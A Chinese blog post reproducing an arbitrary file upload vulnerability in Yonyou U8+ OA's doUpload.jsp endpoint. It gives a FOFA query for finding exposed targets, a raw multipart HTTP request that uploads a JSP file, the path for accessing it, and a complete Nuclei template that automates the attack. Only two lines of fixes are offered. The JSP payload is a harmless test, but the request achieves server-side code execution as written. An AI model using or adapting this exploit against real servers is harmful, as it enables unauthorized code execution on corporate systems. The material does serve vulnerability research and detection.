用友U8+OA doUpload.jsp 文件上传漏洞

最新推荐文章于 2024-04-18 11:27:01 发布
最新推荐文章于 2024-04-18 11:27:01 发布
阅读量551 收藏 8
点赞数 13
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52204925/article/details/136245661
版权

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

用友U8+ OA经过20多年的市场锤炼,不断贴近客户需求,以全新UAP为平台,应对中型及成长型企业客户群的发展,提供的是一整套企业级数智化升级解决方案,为成长型企业构建精细管理、产业链协同、社交化运营为一体的企业互联网经营管理平台,助力企业应势而变,赢得未来。

用友U8+ OA doUpload.jsp 接口存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个 web 服务器。

Ⅱ、fofa语句

title="用友U8-OA"

Ⅲ、漏洞复现

POC

POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Length: 248
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----syowx9dzsw75xlftuop1

------syowx9dzsw75xlftuop1
Content-Disposition: form-data; name="iconFile";filename="p3jxifcpyb.jsp"

<% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>    
------syowx9dzsw75xlftuop1--

1、构建poc

2、访问

http://127.0.0.1​/yyoa/portal/upload/1707381374791.jsp

 

Ⅳ、Nuclei-POC

id: yonyou-U8-doUpload-jsp-uploadfile

info:
  name: 用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个 web 服务器。
  author: WLF
  severity: high
  metadata: 
    fofa-query: title="用友U8-OA"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Length: 219
        Content-Type: multipart/form-data; boundary=7b1db34fff56ef636e9a5cebcd6c9a75

        --7b1db34fff56ef636e9a5cebcd6c9a75
        Content-Disposition: form-data; name="iconFile"; filename="ceshi.jsp"
        Content-Type: application/octet-stream

        <% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
        --7b1db34fff56ef636e9a5cebcd6c9a75--

      - |
        GET /yyoa/portal/upload/{{path}}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0

    extractors:
      - type: regex
        name: path
        group: 1
        regex:
           - 'window\.returnValue = "(\w*)\.jsp"'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"Hello World!")

Ⅴ、修复建议

1、设置访问控制策略

2、升级至安全版本

Love Seed
关注
  • 13
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
用友U8+ OA doUpload.jsp 接口文件上传
weixin_43567873的博客
03-06 34
用友U8+ OA doUpload.jsp 接口存在文件上传
node.js文件上传重命名以及移动位置的示例代码
12-23
一个关于node上传文件的例子,下面是前端代码, doUpload() { var formData = new FormData($("#uploadForm")[0]); $.ajax({ url: 'http://localhost:3011/upload', type: 'POST', data: formData, async: ...
某友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
02-23 510
某友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞,附带自己写的poc脚本
新接口-用友U8+OA doUpload.jsp 文件上传漏洞-1day未公开漏洞
weixin_43167326的博客
02-24 748
用友U8+ OA经过20多年的市场锤炼,不断贴近客户需求,以全新UAP为平台,应对中型及成长型企业客户群的发展,提供的是一整套企业级数智化升级解决方案,为成长型企业构建精细管理、产业链协同、社交化运营为一体的企业互联网经营管理平台,助力企业应势而变,赢得未来。用友U8+ OA doUpload.jsp 接口存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个 web 服务器。
用友U8 Cloud hr SQL注入漏洞
最新发布
Keepb1ue的博客
04-18 304
用友U8 Cloud 提供企业级云ERP整体解决方案,全面支持多组织业务协同,实现企业互联网资源连接。U8 Cloud 亦是亚太地区成长型企业最广泛采用的云解决方案。用友U8 cloud hr 接口处存在SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,从而盗取用户数据,造成用户信息泄露。
【复现】用友U8 oa协同工作系统 文件上传漏洞_57
fushuang333的博客
02-24 952
【复现】用友U8 oa协同工作系统 文件上传漏洞,上传文件漏洞的影响可能会非常严重,上传可执行代码可能让攻击者获得服务器控制权。
【1day】用友 U8 Cloud系统upload.jsp接口任意文件上传漏洞学习
记录并分享学习安全的知识点..
12-05 478
用友U8 Cloud是中国企业软件公司用友软件推出的一款云端企业管理软件解决方案。它基于云计算和大数据技术,为企业提供全面的企业管理功能和服务。用友 U8 Cloud系统upload.jsp接口存在任意文件上传漏洞,攻击者通过上传恶意文件,从而在Web服务器上执行未经授权的操作。
用友GRP-U8 存在任意文件上传漏洞
holyxp的博客
07-26 1784
用友GRP-U8是面向政府及行政事业单位的财政管理应用。
玩转CodeQLpy之用友GRP-U8漏洞挖掘
C20220511的博客
03-09 1215
通过CodeQLpy可以辅助代码审计人员快速定位代码中的问题,目前支持对SprintBoot的jar包,SpringMVC的war包,直接下载的源码文件夹,maven项目源码等方式进行自动化代码审计,详细使用方式参考github。使用CodeQLpy可以直接从目标源码中找到上百个高危的漏洞,包括但不限于反序列化,任意文件上传,任意文件删除,SQL注入,SSRF,XSS等,如图2.2所示。利用CodeQLpy生成的数据库,结合CSV文件中保存的有结果的插件名称,可以在VS中复现漏洞查找过程。
致远A6-m协同管理软件任意文件上传漏洞复现
qq_36334672的博客
03-04 276
致远A6-m协同管理软件doUpload.jsp接口存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传恶意文件,从而控制服务器。
用友U8-OA协同工作系统doUpload.jsp接口任意文件上传漏洞
qq_36334672的博客
03-04 232
用友U8-OA协同工作系统doUpload.jsp接口存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传恶意文件,从而控制服务器。
致远OA漏洞复现
热门推荐
混子
12-31 4万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
php实现文件上传基本验证
12-20
本文实例为大家分享了php实现文件上传基本验证的具体代码,供大家参考,具体内容如下 Html部分 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>文件上传&lt...
vue实现文件上传功能
01-19
vue 文件上传,供大家参考,具体内容如下 首先 先说一下想要实现的效果 就如截图所见,需要将企业和需要上传的文件提交到后台处理,那么接下来就说如何实现 vue 实现 vue 页面代码 ref=upload action=...
文件上传
05-05
通过jsp前端进行多文件上传 显示层代码: <%@ page language="java" import="java.util.*" pageEncoding="GBK"%> <%@ page import="com.jspsmart.upload.*" %> <!DOCTYPE ...
JEE2实现文件上传
03-16
在 JEE2 中,我们可以使用 Servlet 和 JSP 来实现文件上传。 首先,我们需要了解 HTTP 请求的机制。HTTP 请求是指客户端向服务器端发送请求的过程。在文件上传过程中,我们需要了解如何解析 HTTP 请求中的文件信息...
用友U8+OA doUpload.jsp 文件上传漏洞复现
0xSec
02-08 636
用友U8+ OA doUpload.jsp 接口存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个web服务器。
0day-用友U8-OA协同工作系统doUpload.jsp任意文件上传漏洞-未公开漏洞
weixin_43167326的博客
02-28 591
用友U8-OA协同管理软件定位于企事业组织行为管理的需求,融入现金的协同管理理念,为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营所涉及的协作管理、审批管理、公文管理、知识管理、文化建设、资源管理等关键内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、管理规范、公文流转、知识共享、文化建设、资源整合等难题,提升办公效率、实现资源共享、降低组织管理成本,全面提升企业核心竞争力。U8-OA能够帮助企业实现业务数据互通互联,减少用户数据重复录入、保持数据一致性和完整性;
【1day】用友GRP-U8 OA日志泄露漏洞学习
记录并分享学习安全的知识点..
09-29 231
用友GRP-U8 OA是一款企业级管理软件,主要面向中小型企业,提供全面的业务管理解决方案,包括财务、人力资源、采购、销售、仓库、生产等多个模块。用友GRP-U8 OA存在日志泄露漏洞,攻击者可以从系统或应用程序的日志中获取敏感信息的漏洞。这些敏感信息可能包括用户凭据、会话令牌、交易数据、个人身份信息等等。
SpringBoot使用MultipartFile类上传文件,@Async异步处理报文件不存在异常
03-28
可能是因为异步处理方法执行时,上传文件的流已经关闭了,导致文件不存在异常。可以将上传文件的流传递到异步处理方法中,或者使用Spring的TaskExecutor来异步处理文件上传。具体实现方法可以参考以下代码: ``` @...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值